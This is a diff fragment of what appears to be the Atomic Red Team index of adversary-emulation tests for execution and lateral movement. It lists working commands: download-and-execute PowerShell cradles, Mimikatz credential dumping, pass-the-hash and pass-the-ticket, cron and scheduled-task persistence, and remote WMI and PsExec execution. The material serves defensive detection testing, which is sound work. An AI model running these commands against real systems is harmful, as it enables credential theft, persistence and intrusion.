`atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -61563,7 +61563,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1059: technique: created: '2017-05-31T21:30:49.546Z' @@ -61860,7 +61860,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. - ' +' supported_platforms: - containers input_arguments: @@ -61875,20 +61875,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} - ' +' name: bash elevation_required: false T1053.007: @@ -61957,7 +61957,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -61968,17 +61968,17 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -61990,7 +61990,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -62001,20 +62001,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1053.003: @@ -62073,7 +62073,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -62093,7 +62093,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -62101,7 +62101,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -62133,7 +62133,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -62150,10 +62150,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1610: technique: external_references: @@ -62300,7 +62300,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word - ' +' supported_platforms: - windows executor: @@ -62323,13 +62323,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script - ' +' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx - ' +' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 @@ -62643,7 +62643,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl - ' +' supported_platforms: - macos input_arguments: @@ -62658,10 +62658,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} - ' +' cleanup_command: 'launchctl remove #{label_name} - ' +' name: bash T1053.004: technique: @@ -62802,7 +62802,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product: @@ -62813,7 +62813,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62824,7 +62824,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62833,13 +62833,13 @@ execution: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file - ' +' supported_platforms: - windows input_arguments: @@ -62857,7 +62857,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 - ' +' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 @@ -62875,7 +62875,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62886,7 +62886,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62914,7 +62914,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62925,7 +62925,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62952,7 +62952,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62963,7 +62963,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62995,7 +62995,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed - ' +' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null @@ -63005,7 +63005,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement" - ' +' executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs" @@ -63077,7 +63077,7 @@ execution: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -63086,10 +63086,10 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' - description: 'Google Chrome must be installed - ' +' prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName @@ -63098,7 +63098,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -63107,7 +63107,7 @@ execution: name: powershell cleanup_command: 'Stop-Process -name mshta - ' +' - name: Potentially Unwanted Applications (PUA) auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: 'The Potentially Unwanted Applications (PUA) protection feature @@ -63119,7 +63119,7 @@ execution: instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). - ' +' supported_platforms: - windows input_arguments: @@ -63154,16 +63154,16 @@ execution: macro_path: description: 'Location of file which will be converted to a VBA macro - ' +' type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. - ' +' type: Url - default: + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server. @@ -63180,7 +63180,7 @@ execution: ms_product: description: 'Maldoc application Word or Excel - ' +' type: String default: Word dependency_executor_name: powershell @@ -63188,17 +63188,17 @@ execution: - description: 'Destination c2_domain name or IP address must be set to a running HTTP server. - ' +' prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1) - ' +' get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" - ' +' - description: 'Microsoftt #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -63209,7 +63209,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: name: powershell command: | @@ -63222,7 +63222,7 @@ execution: cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore - ' +' T1204.003: technique: external_references: @@ -63564,7 +63564,7 @@ execution: description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -63576,7 +63576,7 @@ execution: command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds" - ' +' name: command_prompt elevation_required: true - name: Run BloodHound from local disk @@ -63596,15 +63596,15 @@ execution: dependencies: - description: 'SharpHound.ps1 must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" - ' +' executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan @@ -63613,7 +63613,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force - ' +' name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 @@ -63631,7 +63631,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force - ' +' name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 @@ -63639,7 +63639,7 @@ execution: out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" - ' +' supported_platforms: - windows executor: @@ -63654,7 +63654,7 @@ execution: will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. - ' +' supported_platforms: - windows executor: @@ -63685,7 +63685,7 @@ execution: command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''" - ' +' name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da @@ -63705,7 +63705,7 @@ execution: MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" - ' +' name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 @@ -63725,7 +63725,7 @@ execution: bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX" - ' +' name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af @@ -63743,7 +63743,7 @@ execution: executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()" - ' +' name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 @@ -63785,26 +63785,26 @@ execution: dependencies: - description: 'PowerShell version 2 must be installed - ' +' prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually - ' +' executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion - ' +' name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -63815,14 +63815,14 @@ execution: dependencies: - description: 'Homedrive must be an NTFS drive - ' +' prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically - ' +' executor: name: powershell command: | @@ -63831,7 +63831,7 @@ execution: Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore - ' +' - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: | @@ -63848,12 +63848,12 @@ execution: dependencies: - description: 'PSRemoting must be enabled - ' +' prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting - ' +' executor: name: powershell elevation_required: true @@ -63887,7 +63887,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction @@ -63923,7 +63923,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation @@ -63954,7 +63954,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute @@ -63990,7 +63990,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments @@ -64003,7 +64003,7 @@ execution: outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -64014,7 +64014,7 @@ execution: executor: command: 'powershell.exe -e #{obfuscated_code} - ' +' name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 @@ -64036,7 +64036,7 @@ execution: "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" - ' +' executor: name: powershell elevation_required: true @@ -64050,7 +64050,7 @@ execution: auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia - ' +' supported_platforms: - windows executor: @@ -64135,7 +64135,7 @@ execution: $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests - ' +' executor: command: | which_python=$(which python || which python3 || which python2) @@ -64175,7 +64175,7 @@ execution: dependencies: - description: 'Requires Python - ' +' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64202,7 +64202,7 @@ execution: an external malicious script then executes locally using the supplied executor and arguments - ' +' supported_platforms: - linux input_arguments: @@ -64236,7 +64236,7 @@ execution: dependencies: - description: 'Requires Python - ' +' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64259,7 +64259,7 @@ execution: name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name} - ' +' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -64357,7 +64357,7 @@ execution: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -64374,10 +64374,10 @@ execution: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -64413,11 +64413,11 @@ execution: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -64439,7 +64439,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -64456,7 +64456,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -64467,7 +64467,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -64480,7 +64480,7 @@ execution: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -64492,7 +64492,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -64706,7 +64706,7 @@ execution: sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host @@ -64740,10 +64740,10 @@ execution: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - ' +' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -64753,7 +64753,7 @@ execution: command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" - ' +' name: command_prompt T1129: technique: @@ -64886,7 +64886,7 @@ execution: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. - ' +' supported_platforms: - windows input_arguments: @@ -64902,10 +64902,10 @@ execution: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) - ' +' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -65128,20 +65128,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -65158,20 +65158,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -65238,7 +65238,7 @@ execution: auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script. - ' +' supported_platforms: - macos - linux @@ -65255,7 +65255,7 @@ execution: sh #{script_path} cleanup_command: 'rm #{script_path} - ' +' name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -65272,7 +65272,7 @@ execution: wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt - ' +' name: sh T1204: technique: @@ -65429,7 +65429,7 @@ execution: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -65440,7 +65440,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -65449,7 +65449,7 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null - ' +' name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 @@ -65468,7 +65468,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -65479,7 +65479,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -65488,7 +65488,7 @@ execution: cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore - ' +' name: powershell T1059.003: technique: @@ -65539,7 +65539,7 @@ execution: description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. - ' +' supported_platforms: - windows input_arguments: @@ -65555,27 +65555,27 @@ execution: dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path}) - ' +' prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path} - ' +' cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. - ' +' supported_platforms: - windows input_arguments: @@ -65590,17 +65590,17 @@ execution: executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" - ' +' cleanup_command: 'del "#{file_contents_path}" >nul 2>&1 - ' +' name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -65691,7 +65691,7 @@ execution: executor: command: 'wmic useraccount get /ALL /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 @@ -65703,7 +65703,7 @@ execution: executor: command: 'wmic process get caption,executablepath,commandline /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 @@ -65715,7 +65715,7 @@ execution: executor: command: 'wmic qfe get description,installedOn /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 @@ -65739,7 +65739,7 @@ execution: executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") - ' +' name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 @@ -65756,11 +65756,11 @@ execution: executor: command: 'wmic process call create #{process_to_execute} - ' +' cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1 - ' +' name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b @@ -65791,11 +65791,11 @@ execution: command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} - ' +' cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 - ' +' name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c @@ -65812,7 +65812,7 @@ execution: executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA - ' +' name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 @@ -65846,7 +65846,7 @@ execution: description: 'This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. - ' +' supported_platforms: - windows input_arguments: @@ -65870,12 +65870,12 @@ execution: get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" - ' +' executor: command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" - ' +' cleanup_command: taskkill /f /im calculator.exe name: powershell - name: Application uninstall using WMIC @@ -66198,7 +66198,7 @@ lateral-movement: command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") - ' +' name: powershell T1210: technique: @@ -66451,7 +66451,7 @@ lateral-movement: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -66466,13 +66466,13 @@ lateral-movement: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" - ' +' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec - ' +' supported_platforms: - windows input_arguments: @@ -66501,14 +66501,14 @@ lateral-movement: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) - ' +' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} - ' +' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -66589,7 +66589,7 @@ lateral-movement: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -66597,7 +66597,7 @@ lateral-movement: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -66606,10 +66606,10 @@ lateral-movement: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -66620,7 +66620,7 @@ lateral-movement: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" - ' +' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -66663,19 +66663,19 @@ 